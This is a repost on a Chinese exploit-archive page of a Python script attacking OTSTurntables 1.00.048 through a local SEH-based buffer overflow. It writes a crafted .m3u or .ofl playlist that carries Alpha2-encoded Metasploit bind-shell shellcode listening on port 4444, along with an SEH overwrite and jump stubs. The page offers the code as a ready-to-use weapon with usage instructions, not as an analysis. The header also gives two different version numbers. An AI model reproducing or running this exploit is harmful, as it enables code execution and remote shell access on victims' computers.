首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
来源:vfocus.net 作者:0v3r 发布时间:2010-11-29  

# Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH)
# Date: 11/24/2010
# Author: 0v3r
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.048
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import sys

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x48\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x32\x42\x42\x42\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4b\x59\x4b\x4c\x30"
"\x6a\x58\x6b\x52\x6d\x6d\x38\x38\x79\x39\x6f\x4b\x4f\x39\x6f\x75"
"\x30\x6e\x6b\x32\x4c\x71\x34\x34\x64\x6e\x6b\x31\x55\x37\x4c\x6e"
"\x6b\x33\x4c\x55\x55\x53\x48\x57\x71\x68\x6f\x6c\x4b\x50\x4f\x47"
"\x68\x6e\x6b\x53\x6f\x47\x50\x56\x61\x7a\x4b\x72\x69\x6e\x6b\x36"
"\x54\x4e\x6b\x63\x31\x38\x6e\x37\x41\x6b\x70\x4f\x69\x6c\x6c\x4b"
"\x34\x4b\x70\x52\x54\x64\x47\x6f\x31\x4b\x7a\x34\x4d\x46\x61\x59"
"\x52\x48\x6b\x5a\x54\x65\x6b\x73\x64\x41\x34\x77\x58\x74\x35\x6b"
"\x55\x4e\x6b\x61\x4f\x57\x54\x75\x51\x58\x6b\x70\x66\x6c\x4b\x36"
"\x6c\x42\x6b\x6e\x6b\x31\x4f\x67\x6c\x46\x61\x7a\x4b\x63\x33\x66"
"\x4c\x6c\x4b\x6c\x49\x50\x6c\x66\x44\x47\x6c\x53\x51\x6f\x33\x64"
"\x71\x4b\x6b\x41\x74\x4e\x6b\x63\x73\x56\x50\x6c\x4b\x63\x70\x76"
"\x6c\x6c\x4b\x52\x50\x67\x6c\x6c\x6d\x4c\x4b\x57\x30\x43\x38\x33"
"\x6e\x53\x58\x4c\x4e\x30\x4e\x76\x6e\x7a\x4c\x32\x70\x4b\x4f\x78"
"\x56\x62\x46\x66\x33\x61\x76\x75\x38\x66\x53\x36\x52\x75\x38\x71"
"\x67\x32\x53\x45\x62\x63\x6f\x56\x34\x6b\x4f\x6e\x30\x70\x68\x58"
"\x4b\x48\x6d\x4b\x4c\x35\x6b\x46\x30\x6b\x4f\x38\x56\x53\x6f\x4f"
"\x79\x6b\x55\x50\x66\x6e\x61\x48\x6d\x76\x68\x37\x72\x73\x65\x41"
"\x7a\x45\x52\x79\x6f\x38\x50\x30\x68\x4b\x69\x34\x49\x49\x65\x6e"
"\x4d\x66\x37\x6b\x4f\x7a\x76\x50\x53\x46\x33\x36\x33\x42\x73\x46"
"\x33\x57\x33\x50\x53\x41\x53\x32\x73\x6b\x4f\x4e\x30\x75\x36\x31"
"\x78\x77\x61\x73\x6c\x52\x46\x43\x63\x6d\x59\x58\x61\x4c\x55\x52"
"\x48\x4f\x54\x54\x5a\x50\x70\x4f\x37\x61\x47\x4b\x4f\x4e\x36\x30"
"\x6a\x76\x70\x73\x61\x71\x45\x39\x6f\x6e\x30\x30\x68\x69\x34\x6c"
"\x6d\x76\x4e\x49\x79\x66\x37\x79\x6f\x6b\x66\x63\x63\x42\x75\x59"
"\x6f\x7a\x70\x41\x78\x4d\x35\x57\x39\x6c\x46\x57\x39\x42\x77\x59"
"\x6f\x68\x56\x52\x70\x31\x44\x51\x44\x46\x35\x4b\x4f\x78\x50\x4e"
"\x73\x50\x68\x58\x67\x44\x39\x48\x46\x30\x79\x41\x47\x6b\x4f\x59"
"\x46\x51\x45\x6b\x4f\x6e\x30\x75\x36\x50\x6a\x70\x64\x32\x46\x62"
"\x48\x52\x43\x50\x6d\x6d\x59\x4d\x35\x63\x5a\x52\x70\x32\x79\x65"
"\x79\x38\x4c\x4f\x79\x69\x77\x30\x6a\x62\x64\x4b\x39\x6b\x52\x30"
"\x31\x4f\x30\x6a\x53\x6c\x6a\x39\x6e\x43\x72\x74\x6d\x59\x6e\x71"
"\x52\x74\x6c\x6f\x63\x4c\x4d\x50\x7a\x50\x38\x6c\x6b\x4e\x4b\x6c"
"\x6b\x33\x58\x33\x42\x59\x6e\x6f\x43\x45\x46\x39\x6f\x53\x45\x50"
"\x44\x79\x6f\x79\x46\x63\x6b\x50\x57\x71\x42\x71\x41\x70\x51\x50"
"\x51\x33\x5a\x74\x41\x42\x71\x32\x71\x76\x35\x30\x51\x69\x6f\x7a"
"\x70\x72\x48\x4e\x4d\x6a\x79\x53\x35\x6a\x6e\x30\x53\x79\x6f\x5a"
"\x76\x30\x6a\x6b\x4f\x39\x6f\x65\x67\x6b\x4f\x5a\x70\x6e\x6b\x72"
"\x77\x59\x6c\x6b\x33\x7a\x64\x70\x64\x49\x6f\x7a\x76\x76\x32\x6b"
"\x4f\x5a\x70\x30\x68\x6c\x30\x6f\x7a\x57\x74\x73\x6f\x73\x63\x6b"
"\x4f\x38\x56\x4b\x4f\x4e\x30\x4a")


# near jump 928 bytes encoded with Alpha2 encoder
jump = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x51\x5a\x6a\x65"
"\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x75\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x38\x69\x49\x79\x55"
"\x30\x79\x6c\x4b\x4f\x4b\x4f\x65")

nopsled  = "\x90" * 16
junk     = "\x90" * (912 - len(shellcode))
nseh     = "\xeb\x06\x90\x90"            # short jump
seh      = "\x3f\x28\xd1\x72"     # 0x72D1283F - ppr - msacm32.drv
jump     = "\xe9\x60\xfc\xff\xff"    # near jump
stuff  = "\x44" * 10000

buff = junk + shellcode + nseh + seh + nopsled + jump + stuff

 

try: 
  print "\n" 
 print "---------------------------------------------------------------------------------"
 print "|          OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)            |"
 print "---------------------------------------------------------------------------------"
 print "\n"
 
 if len(sys.argv)!=2:
 
         print "Usage: exploit.py <option>\n"
  print "File type options:"
  print "[1] m3u file"
  print "[2] ofl file"
         sys.exit(0)


 if int(sys.argv[1]) == 1:
  fname = "exploit.m3u" 
 elif int(sys.argv[1]) == 2 :
  fname = "exploit.ofl"
 else: 
  print "Check again the available options!"
  sys.exit(0)
 
 f = open(fname,'w')
 f.write(buff)
 f.close()
 
 print "- File ",fname," created..."
 print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname
except SystemExit:
 pass
except ValueError:
 print "Check again the available options!"
except:
 print "-Oooops! Can't write file...\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CA Internet Security Suite 201
·Hanso Player Version 1.4.0 (.m
·MemHT Portal 4.0.1 [user agent
·Linux Kernel Unix Sockets Loca
·Local Root Privilege Escalatio
·Linux Kernel 'setup_arg_pages(
·Mediacoder 0.7.5.4792 Buffer O
·OSX/Intel - setuid shell x86_6
·HP LaserJet Directory Traversa
·Linux/ARM - add root user with
·FoxPlayer v2.4.0 Denial of Ser
·NCH Officeintercom <= v5.20 Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved